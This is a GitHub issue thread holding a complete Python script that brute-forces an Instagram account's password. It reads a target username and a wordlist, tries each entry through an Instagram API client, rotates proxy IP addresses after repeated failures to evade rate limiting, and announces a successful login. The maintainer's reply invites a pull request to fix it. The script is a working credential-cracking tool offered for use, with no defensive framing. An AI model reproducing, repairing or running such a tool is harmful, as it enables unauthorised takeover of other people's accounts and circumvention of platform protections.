### ISSUE TITLE
fix at line 69

### ISSUE THREAD

**Issue by 0xbitx** [STARK-404/INSTA#7]
`
import requests
import os
from getpass import getpass
import time
import subprocess as sub
import random
import re
from rich.console import Console
from rich.panel import Panel
from rich import print
import instagram_private_api
import time
import sys
import json
from rich import print
codeList = ["TR", "US-C", "US", "US-W", "CA", "CA-W",
            "FR", "DE", "NL", "NO", "RO", "CH", "GB", "HK"]

def banner():
 os.system('cls' if os.name=='nt' else 'clear')
 print(Panel( '''

[bold green] ___ _   _ ____ _____  _    
[bold green]|_ _| \ | / ___|_   _|/ \   
[bold green] | ||  \| \___ \ | | / _ \  
[bold green] | || |\  |___) || |/ ___ \ 
[bold green]|___|_| \_|____/ |_/_/   \_\
[bold green]                            
'''))
 print(Panel('''
[bold white][[bold red]^[bold white]] [bold green] Au: STARK-404
[bold white][[bold red]^[bold white]] [bold green] Github:github.com/STARK-404 
[bold white][[bold red]^[bold white]] [bold green] Insta: la1uuuuu
 '''))
 pass

banner()

username = input('\033[90m[\033[91m?\033[90m] \033[92m ENTER INSTAGRAM USERNAME FOR CRACK PASSWORD \n  ' '└─> ')
wl = input("\n[?]Enter the PassList along The Path " '\n └─> ')
     

http_proxy = "http://10.10.1.10:3128"
https_proxy = "https://10.10.1.11:1080"
ftp_proxy = "ftp://10.10.1.10:3128"
proxyDict = {
    "http": "120.236.74.213:9002, 188.123.114.167:80, 185.82.139.1:443, 1.10.231.42:8080",
    "https": "158.69.53.98:9300, 193.201.228.121:80, 31.186.239.245:8080, 112.217.162.5:3128",
    "ftp": "36.91.166.98:8080, 188.132.222.3:8080, 188.132.221.24:8080, 185.230.48.164:32650"
}

# initialize counter and proxy switch flag
failed_attempts = 0
use_proxy = False
proxy_list = ["120.236.74.213:9002", "188.123.114.167:80", "185.82.139.1:443"]
proxy_index = 0

password = 'pass@123'
file1 = open(wl,'r')
Lines = file1.readlines()
count = 0
for line in Lines:
  try:
     password = ''
     count += 1
     pstest = ("{}".format(line.strip()))
     password = pstest
     choiceCode = random.choice(codeList)
     time.sleep(5)
     banner()
     print("\n[bold white][[bold yellow]•[bold white]] [bold white]Trying Pass : "+pstest)
     if use_proxy:
        session = requests.Session()
        session.proxies = {"http":proxy_list[proxy_index]}
        
     brute = instagram_private_api.Client( username , password)
     print("\n[bold green][✓]Login Sucessfull: [italic green]"+password)
     veri_break = "si"
     exit()
  except instagram_private_api.ClientLoginError as e :
    print("\n[bold white][[bold yellow]![bold white]][bold red] Login failed : " + password)
    failed_attempts += 1
    if failed_attempts >= 4:
       use_proxy = True
       failed_attempts = 0
       proxy_index = (proxy_index + 1) % len(proxy_list)
       print("\n[bold yellow][+] Switching Proxy : " +proxy_list[proxy_index])
         
`

**Comment by STARK-404** [comment]
Make a pull request!
